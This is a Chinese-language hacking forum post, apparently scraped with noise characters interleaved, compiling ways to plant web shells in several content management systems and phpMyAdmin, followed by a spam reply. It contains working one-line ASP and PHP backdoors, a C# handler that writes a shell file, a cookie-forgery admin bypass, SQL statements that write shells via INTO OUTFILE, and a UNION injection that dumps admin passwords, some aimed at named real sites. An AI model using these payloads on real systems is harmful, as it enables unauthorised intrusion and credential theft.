<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
( C: _$ f4 h: KUpload a new file:<br>2 {' l* y6 @5 ]8 r0 j7 U2 C8 C6 o
<input type="file" name="NewFile" size="50"><br>
, T9 r7 Q, V/ Q1 E2 [. u<input id="btnUpload" type="submit" value="Upload">
# J- {( |( M/ o0 x# V1 d0 ?</form>
# Q0 q7 ?1 Q/ W. @/ p-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------* t% k% M6 E7 M  g. U6 ?

4 p) _' y. B2 K6 aSDcms 后台拿webshell
' t) C& n7 E$ k7 A$ s
2 k2 b) q( E9 H# `第一种方法:( X) A( T5 O  K. \6 _4 o
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
* ^7 B2 x) q+ h2 F. b8 o把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
  Q+ M; h( ?" {6 d8 w  R1 U用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。5 t/ E8 e: b# o% o1 P+ Y- d
第二种方法:. ~" U7 o- c8 L; R) V% c
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
* `; p! h% ^4 H* q0 R在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!2 W1 ~# k$ S5 c5 S8 A
第三种方法:) s1 a  P6 `: w5 a8 ~9 l
进入后台-->界面管理-->模板文件管理-->创建文件* q% A: l" I5 ]
文件名写入getshell.ashx$ H8 R& k% {4 S( V  c1 M+ M
内容写入下面内容:1 F( ?3 b/ s5 |% e
/====================复制下面的=========================/' m7 T# d) }# m
<%@ WebHandler Language="C#" Class="Handler" %>
9 |+ T% G# G$ L5 G# Gusing System;) W! s) G& o2 y2 n
using System.Web;
! B3 U3 Q5 A- tusing System.IO;( _. I! f- c5 i" l! M+ W+ O
public class Handler : IHttpHandler {& W0 b: A$ E  R6 e/ k0 h# |& F% ^
public void ProcessRequest (HttpContext context) {
8 B7 l$ ^6 Y( x' Bcontext.Response.ContentType = "text/plain";7 K, {4 m( g: V6 I8 A
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));2 I& K5 B- k1 ]2 `2 K9 |
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");4 }/ F! s. q4 [7 ]: w6 \
file1.Flush();' d' h' C' |4 B: y4 a
file1.Close();
* _8 P; B6 r7 P1 s/ N7 p" _}; C( ?7 m" t+ O8 H
public bool IsReusable {
9 N" f0 n# W" B2 Z" a3 K2 f4 |get {: P4 h# y0 i/ {3 `
return false;+ N+ z2 @( V2 b( @6 C! T! t. B
}
) {6 p+ Z- q/ v- [0 G9 A0 b3 ^}4 @" i9 j7 u) i0 ]- ^
}
$ o+ e& {1 k1 i' V8 L/=============================================/' R7 q% ?0 _' C. Y: ]& \% V
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx, `& N% x0 j9 A: C8 ~
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接& E9 R+ h* H5 E! ~( u8 j5 F
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------# a! o) R4 p# E5 l0 J" I

6 h. _& V2 u" z! j# G; H# F7 E2 |3 \ESCMS网站管理系统0day
# X! w7 `: s! e2 [! ]7 ?2 p; q/ b  @6 m1 B2 ~+ _6 t
后台登陆验证是通过admin/check.asp实现的& P( H) E* m/ L) O, @

5 N* W6 ?7 R  ^2 ]8 R3 P首先我们打开http://target.com/admin/es_index.html" |, ^- n6 [4 L9 o
然后在COOKIE结尾加上/ P* Z$ J4 {* o
; ESCMS$_SP2=ES_admin=st0p;( `# p: ], A0 \+ Q0 \/ ~7 j
修改,然后刷新4 y9 W. D: f# ~' d8 z1 ]
进后台了嘎..
) e4 A9 j9 E  T1 h: H然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL: \( a/ w9 B8 m" L  H) S
1 G5 ~% O3 q( b6 k( G8 O
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
% x6 M9 D% O, J* K嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
% _* l0 `# R2 P' m存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..4 C" s. N! S. {+ [' d1 I; F) ^
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
5 N% |. l. z  b8 N------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 V3 o, @9 A7 t, B: `4 `6 y4 Z! @( x, s# \" G1 g
宁志网站管理系统后台无验证漏洞及修复
9 v& s7 b3 L; g- O* j+ ~: z+ A& L+ l, h
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
/ e' o" t8 F# _# @- c8 D官方网站:www.ningzhi.net
( g( D1 _# o! g% t4 @! \# Y学校网站管理系统 V.2011版本 % {* P7 u$ a3 ^. b0 A2 x9 R
http://down.chinaz.com/soft/29943.htm
% z& e0 [2 }, F8 w2 q/ Q% h其它版本(如:政府版等),自行下载.  d# W, g+ s+ r: z( p7 @8 ~9 ~% I/ k
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
' z* }1 U+ N' v5 Q/ W. q' g) plogin.asp代码如下:
% U* t9 }# Y5 R$ H<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
$ W5 [; S) |1 l; {( [4 i+ I! a# lmanage.asp代码我就不帖出来了.反正也没验证.' A7 S$ C8 O! O. [
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
& P/ \' D7 k$ G0 b漏洞利用:
& S& F& Y% p8 c4 v: \: k直接访问http://www.0855.tv/admin/manage.asp' N  j# I1 c; d! f" U
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web54 q- ~+ |- x7 }, e
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 }" F8 M! v2 [4 Z% L0 [* t4 W7 q* P
& K" ^7 T. E/ |8 ^3 {( Tphpmyadmin拿shell的四种方法总结及修复6 `2 m$ a& B  ~# ]4 _

3 L' h8 E( {& E/ D+ N5 z方法一:
& U- g* y# t$ }0 V& O* @& \9 RCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
7 z( {& z* n- }, @1 R# YINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
; z5 M7 l- Q( |% b  D* rSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
: i: C# b+ `7 ^' B2 C% @9 F" x----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php1 v/ b8 B9 {3 j: Y
    一句话连接密码:7on
; @- K+ c, m6 H. o7 K6 J方法二:/ v* M2 k, F' Y8 N& s% @
读取文件内容:    select load_file('E:/xamp/www/s.php');
0 p" [) m! M& |$ l% D: [. Z% g+ }写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
6 Y- w6 U( a! a9 v9 X; j- [cmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
- ?5 ?/ ], D  j# v8 c方法三:6 Q. W0 _, \. g' d
JhackJ版本 PHPmyadmin拿shell7 X7 p: T# P4 g( y
Create TABLE study (cmd text NOT NULL);% ^; {7 L4 c1 N* C  k
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
. S  q) c; O5 o* d1 f5 rselect cmd from study into outfile 'E:/wamp/www/7.php';: l; X) F/ B+ U% t+ W3 }
Drop TABLE IF EXISTS study;
, a: F& O2 L2 a( b<?php eval($_POST[cmd])?>
, d) D) c7 j# eCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。, J' w  V" s7 Z) ^- A7 L8 V. C2 Y
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1- N- {6 r; N- a
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
7 _. a4 g6 j- p' Y/ W1 X) FDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。" s% P# |5 l5 Z6 Y
方法四:7 Q, O: ~9 V/ W# e7 J# ?
select load_file('E:/xamp/www/study.php');
% A9 t& W# g3 G# g5 s# iselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'8 I' G3 F  \4 J
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir5 ^3 O" U1 x5 b7 i0 w  @  E  Z, b
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 S; k2 y8 i9 P5 \& J. i) E- a5 y. v, N* a
NO.001中学网站管理系统 Build 110628 注入漏洞0 e# C' g. _' }4 T' w4 |" H
9 i. ?  H8 K. X) A' h8 a
NO.001中学网站管理系统功能模块:6 Y# L3 L, ^* {2 |4 z
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
& J- }! x) p3 N7 k2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息4 n* ]) t, V! {3 }. e) v
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
5 m0 M4 z" w8 p  s4 N, Y4.视频图片管理:一级分类,动态添加视频或者图片等信息  {  s. j# ]( C1 W
5.留言管理:对留言,修改,删除、回复等管理: G2 G* j3 ]3 Y* j4 _: ]. X9 N
6.校友频道:包括校友资料excel导出、管理等功能7 N. P: @; l9 _$ M
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
! c( I" f; i5 q. E2 u默认后台:admin/login.asp- M& m/ W6 Y6 ^5 R6 T  r
官方演示:http://demo.001cms.net7 E1 a1 j0 r& i. ?: u/ P. W
源码下载地址:http://down.chinaz.com/soft/30187.htm( a" q7 ^0 I' K: X8 ~: b( c
EXP:* b4 Z% r  P6 ?: H
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
) z# V% f6 R4 z; f8 s测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin! G6 h2 d$ S. j) L# t" p6 y! q% v* d
getshell:后台有备份,你懂的
' f! R% ?* O; u另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
) K# K% i+ @: |9 |; v1 f- a-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表